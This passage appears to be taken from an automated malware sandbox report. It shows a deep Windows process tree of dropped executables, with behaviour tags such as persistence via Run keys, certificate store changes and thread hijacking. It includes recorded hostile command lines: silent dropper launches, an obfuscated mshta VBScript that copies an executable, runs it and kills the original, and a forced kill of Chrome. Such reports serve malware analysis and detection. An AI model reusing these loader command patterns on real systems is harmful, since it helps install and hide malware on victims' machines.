                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ak3oo21h.upt\GcleanerEU.exe /eufive & exit
                                                                                                          13⤵
                                                                                                            PID:8608
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ak3oo21h.upt\GcleanerEU.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\ak3oo21h.upt\GcleanerEU.exe /eufive
                                                                                                              14⤵
                                                                                                                PID:9952
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r3j1ted2.ovg\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                              13⤵
                                                                                                                PID:8796
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\r3j1ted2.ovg\installer.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\r3j1ted2.ovg\installer.exe /qn CAMPAIGN="654"
                                                                                                                  14⤵
                                                                                                                    PID:10104
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\crtu1blx.byv\any.exe & exit
                                                                                                                  13⤵
                                                                                                                    PID:8984
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\crtu1blx.byv\any.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\crtu1blx.byv\any.exe
                                                                                                                      14⤵
                                                                                                                        PID:10172
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\crtu1blx.byv\any.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\crtu1blx.byv\any.exe" -u
                                                                                                                          15⤵
                                                                                                                            PID:7584
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\edwa5hsz.hz4\gcleaner.exe /mixfive & exit
                                                                                                                        13⤵
                                                                                                                          PID:9144
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\edwa5hsz.hz4\gcleaner.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\edwa5hsz.hz4\gcleaner.exe /mixfive
                                                                                                                            14⤵
                                                                                                                              PID:10236
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ulq0nd2n.ftr\autosubplayer.exe /S & exit
                                                                                                                            13⤵
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:2064
                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\IjoOVRDfWVSPqfCe1p2a7AyU.exe
                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\IjoOVRDfWVSPqfCe1p2a7AyU.exe"
                                                                                                                    9⤵
                                                                                                                      PID:7120
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-1K09M.tmp\IjoOVRDfWVSPqfCe1p2a7AyU.tmp
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-1K09M.tmp\IjoOVRDfWVSPqfCe1p2a7AyU.tmp" /SL5="$10488,506127,422400,C:\Users\Admin\Pictures\Adobe Films\IjoOVRDfWVSPqfCe1p2a7AyU.exe"
                                                                                                                        10⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:6844
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-TF513.tmp\ShareFolder.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-TF513.tmp\ShareFolder.exe" /S /UID=2710
                                                                                                                          11⤵
                                                                                                                          • Drops file in Drivers directory
                                                                                                                          PID:8028
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\97-c1998-892-f7d8f-b9bd5e02f29e4\Xysyjakafe.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\97-c1998-892-f7d8f-b9bd5e02f29e4\Xysyjakafe.exe"
                                                                                                                            12⤵
                                                                                                                              PID:8024
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\01vdpulw.fm2\any.exe & exit
                                                                                                                                13⤵
                                                                                                                                  PID:9680
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\01vdpulw.fm2\any.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\01vdpulw.fm2\any.exe
                                                                                                                                    14⤵
                                                                                                                                      PID:10056
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\01vdpulw.fm2\any.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\01vdpulw.fm2\any.exe" -u
                                                                                                                                        15⤵
                                                                                                                                          PID:8200
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c21msloa.edd\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                      13⤵
                                                                                                                                        PID:9332
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\c21msloa.edd\installer.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\c21msloa.edd\installer.exe /qn CAMPAIGN="654"
                                                                                                                                          14⤵
                                                                                                                                            PID:5972
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j1fnsuvz.zep\GcleanerEU.exe /eufive & exit
                                                                                                                                          13⤵
                                                                                                                                            PID:8660
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\j1fnsuvz.zep\GcleanerEU.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\j1fnsuvz.zep\GcleanerEU.exe /eufive
                                                                                                                                              14⤵
                                                                                                                                                PID:2968
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hq5gisxu.4zd\gcleaner.exe /mixfive & exit
                                                                                                                                              13⤵
                                                                                                                                                PID:9856
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\hq5gisxu.4zd\gcleaner.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\hq5gisxu.4zd\gcleaner.exe /mixfive
                                                                                                                                                  14⤵
                                                                                                                                                    PID:9180
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\viuyd0io.up1\autosubplayer.exe /S & exit
                                                                                                                                                  13⤵
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:9976
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\eg3h_R11VgZLcsbFMwzhEFnn.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\eg3h_R11VgZLcsbFMwzhEFnn.exe"
                                                                                                                                          9⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:504
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\__I5f6X_4NwrM5OwtqWxf42D.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\__I5f6X_4NwrM5OwtqWxf42D.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      PID:5352
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe
                                                                                                                                  5⤵
                                                                                                                                    PID:804
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun038aa349e3318e.exe
                                                                                                                                      Sun038aa349e3318e.exe
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Checks computer location settings
                                                                                                                                      PID:2592
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\aIFsmKiC7nDN9aKHcBFCGdkI.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\aIFsmKiC7nDN9aKHcBFCGdkI.exe"
                                                                                                                                        7⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:3232
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\5VHToYB4rQjPQ2iok4Jc8HxD.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\5VHToYB4rQjPQ2iok4Jc8HxD.exe"
                                                                                                                                        7⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        PID:5368
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\wOp2Pk2MWpyeKmICPIIJhwBn.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\wOp2Pk2MWpyeKmICPIIJhwBn.exe"
                                                                                                                                        7⤵
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        PID:4332
                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                                                          8⤵
                                                                                                                                            PID:6592
                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                                                                                                                                            8⤵
                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            PID:6576
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\AzPMhddJwdJRY4KsXOiMq_Pa.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\AzPMhddJwdJRY4KsXOiMq_Pa.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                          PID:4624
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\gFfGXENr1nOUBbBuT3DLofZj.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\gFfGXENr1nOUBbBuT3DLofZj.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:3636
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\4v12ao6Jtnpq8Pe8cr6QUGC1.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\4v12ao6Jtnpq8Pe8cr6QUGC1.exe"
                                                                                                                                          7⤵
                                                                                                                                            PID:4512
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\l6fJ3v0DRwF3Aqdzjzry7eyh.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\l6fJ3v0DRwF3Aqdzjzry7eyh.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:6028
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\drW_Wi9zMPDZvTLKeJCBkFzU.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\drW_Wi9zMPDZvTLKeJCBkFzU.exe"
                                                                                                                                              7⤵
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:588
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\8Xy5HMkB7EnEQiPs3tE5dEsO.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\8Xy5HMkB7EnEQiPs3tE5dEsO.exe"
                                                                                                                                              7⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:5932
                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\8Xy5HMkB7EnEQiPs3tE5dEsO.exe
                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\8Xy5HMkB7EnEQiPs3tE5dEsO.exe"
                                                                                                                                                8⤵
                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                PID:7044
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\9ZbfEM8vXFJcVcEp1G8AjHOZ.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\9ZbfEM8vXFJcVcEp1G8AjHOZ.exe"
                                                                                                                                              7⤵
                                                                                                                                                PID:5664
                                                                                                                                                • C:\Users\Admin\Documents\HI7gahtPkuXe6Tu4GLZoZVta.exe
                                                                                                                                                  "C:\Users\Admin\Documents\HI7gahtPkuXe6Tu4GLZoZVta.exe"
                                                                                                                                                  8⤵
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  PID:6116
                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\vmexDZ3bebXNgvsiEbZm9dpp.exe
                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\vmexDZ3bebXNgvsiEbZm9dpp.exe"
                                                                                                                                                    9⤵
                                                                                                                                                      PID:3364
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\LCGCELJg0qQo32Pd4x3DZouP.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\LCGCELJg0qQo32Pd4x3DZouP.exe"
                                                                                                                                                      9⤵
                                                                                                                                                        PID:6220
                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\O3oAL0DS_71wPkp3PdCyh4Au.exe
                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\O3oAL0DS_71wPkp3PdCyh4Au.exe"
                                                                                                                                                        9⤵
                                                                                                                                                          PID:6168
                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\0yBbe0ZPTQ2vm0nap3ldUeB5.exe
                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\0yBbe0ZPTQ2vm0nap3ldUeB5.exe"
                                                                                                                                                          9⤵
                                                                                                                                                            PID:5944
                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\jorOEUmK5umqcGH1bP2h8dQH.exe
                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\jorOEUmK5umqcGH1bP2h8dQH.exe"
                                                                                                                                                            9⤵
                                                                                                                                                              PID:5540
                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\oq6llXSrq584unGq2YQXmUuQ.exe
                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\oq6llXSrq584unGq2YQXmUuQ.exe"
                                                                                                                                                              9⤵
                                                                                                                                                                PID:5156
                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\oq6llXSrq584unGq2YQXmUuQ.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\oq6llXSrq584unGq2YQXmUuQ.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:6644
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\oq6llXSrq584unGq2YQXmUuQ.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\oq6llXSrq584unGq2YQXmUuQ.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                      11⤵
                                                                                                                                                                        PID:6436
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          taskkill -f -iM "oq6llXSrq584unGq2YQXmUuQ.exe"
                                                                                                                                                                          12⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:2524
                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\1MtdsCAJ6fTxbrmkV9otGTod.exe
                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\1MtdsCAJ6fTxbrmkV9otGTod.exe"
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:1304
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-46K13.tmp\1MtdsCAJ6fTxbrmkV9otGTod.tmp
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-46K13.tmp\1MtdsCAJ6fTxbrmkV9otGTod.tmp" /SL5="$403BE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\1MtdsCAJ6fTxbrmkV9otGTod.exe"
                                                                                                                                                                        10⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                        PID:5664
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-O3QMB.tmp\ShareFolder.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-O3QMB.tmp\ShareFolder.exe" /S /UID=2709
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                          PID:3868
                                                                                                                                                                          • C:\Program Files\Windows Media Player\VSQJYCZXKX\foldershare.exe
                                                                                                                                                                            "C:\Program Files\Windows Media Player\VSQJYCZXKX\foldershare.exe" /VERYSILENT
                                                                                                                                                                            12⤵
                                                                                                                                                                              PID:5604
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fb-e8ef5-c20-b1ca4-a0cdad166c4ad\Hinijivate.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\fb-e8ef5-c20-b1ca4-a0cdad166c4ad\Hinijivate.exe"
                                                                                                                                                                              12⤵
                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                              PID:6004
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\13-83e07-2f3-b688f-3e1f6e3196f08\Jafetyguly.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\13-83e07-2f3-b688f-3e1f6e3196f08\Jafetyguly.exe"
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:3552
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zp1cnv4h.dou\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit
                                                                                                                                                                                  13⤵
                                                                                                                                                                                    PID:2696
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\zp1cnv4h.dou\setting.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\zp1cnv4h.dou\setting.exe SID=778 CID=778 SILENT=1 /quiet
                                                                                                                                                                                      14⤵
                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      PID:8376
                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zp1cnv4h.dou\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zp1cnv4h.dou\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635402156 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"
                                                                                                                                                                                        15⤵
                                                                                                                                                                                          PID:2976
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ttp3ntny.nvd\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                      13⤵
                                                                                                                                                                                        PID:5228
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ttp3ntny.nvd\GcleanerEU.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ttp3ntny.nvd\GcleanerEU.exe /eufive
                                                                                                                                                                                          14⤵
                                                                                                                                                                                            PID:8516
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gltaosyb.c1y\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                          13⤵
                                                                                                                                                                                            PID:3408
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\gltaosyb.c1y\installer.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\gltaosyb.c1y\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                              14⤵
                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                              PID:8680
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gfvjx5mp.1a4\any.exe & exit
                                                                                                                                                                                            13⤵
                                                                                                                                                                                              PID:5972
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\gfvjx5mp.1a4\any.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\gfvjx5mp.1a4\any.exe
                                                                                                                                                                                                14⤵
                                                                                                                                                                                                  PID:8768
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\gfvjx5mp.1a4\any.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\gfvjx5mp.1a4\any.exe" -u
                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                      PID:9360
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ga3w22jx.yei\customer51.exe & exit
                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                    PID:7836
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ga3w22jx.yei\customer51.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\ga3w22jx.yei\customer51.exe
                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                        PID:9056
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q224bcp1.ufk\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                        PID:7960
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\q224bcp1.ufk\gcleaner.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\q224bcp1.ufk\gcleaner.exe /mixfive
                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                            PID:8268
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ouxvtog.vvm\FastPC.exe /verysilent & exit
                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                            PID:1372
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2ouxvtog.vvm\FastPC.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\2ouxvtog.vvm\FastPC.exe /verysilent
                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                PID:9184
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-TP8NN.tmp\FastPC.tmp
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-TP8NN.tmp\FastPC.tmp" /SL5="$106FE,138429,56832,C:\Users\Admin\AppData\Local\Temp\2ouxvtog.vvm\FastPC.exe" /verysilent
                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                  PID:9372
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-5141T.tmp\Setup.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-5141T.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                    PID:5332
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                        PID:3200
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                          taskkill /f /im chrome.exe
                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                          PID:4356
                                                                                                                                                                                                                      • C:\Program Files (x86)\FastPc\FastPc\Fast_.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"
                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                          PID:1320
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                          "C:\Windows\System32\gpupdate.exe" /force
                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                            PID:8452
                                                                                                                                                                                                                          • C:\Program Files (x86)\FastPc\FastPc\FastPCV.exe
                                                                                                                                                                                                                            "C:\Program Files (x86)\FastPc\FastPc\FastPCV.exe" /Verysilent
                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                              PID:352
                                                                                                                                                                                                                            • C:\Program Files (x86)\FastPc\FastPc\Faster.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\FastPc\FastPc\Faster.exe"
                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                              PID:9956
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                  PID:8988
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e3uuubmx.wux\autosubplayer.exe /S & exit
                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                        PID:8256
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zc4vfkif.jmb\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                          PID:8900
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\zc4vfkif.jmb\installer.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\zc4vfkif.jmb\installer.exe /qn CAMPAIGN=654
                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                              PID:9236
                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\rhtG47TcnOKP974Y_Sql7yVh.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\rhtG47TcnOKP974Y_Sql7yVh.exe"
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                      PID:4764
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-4AS94.tmp\rhtG47TcnOKP974Y_Sql7yVh.tmp
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-4AS94.tmp\rhtG47TcnOKP974Y_Sql7yVh.tmp" /SL5="$203C0,506127,422400,C:\Users\Admin\Pictures\Adobe Films\rhtG47TcnOKP974Y_Sql7yVh.exe"
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:5652
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-ALAIU.tmp\ShareFolder.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-ALAIU.tmp\ShareFolder.exe" /S /UID=2710
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                            PID:6352
                                                                                                                                                                                                                            • C:\Program Files\MSBuild\ZFYCIPGDLD\foldershare.exe
                                                                                                                                                                                                                              "C:\Program Files\MSBuild\ZFYCIPGDLD\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                PID:1196
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\81-d42ea-7e2-4a3af-7c81bfa80da0f\Mijisytaecu.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\81-d42ea-7e2-4a3af-7c81bfa80da0f\Mijisytaecu.exe"
                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                PID:4140
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6d-64bc9-7de-3a482-4bae7af7e7052\Golemaecoshi.exe
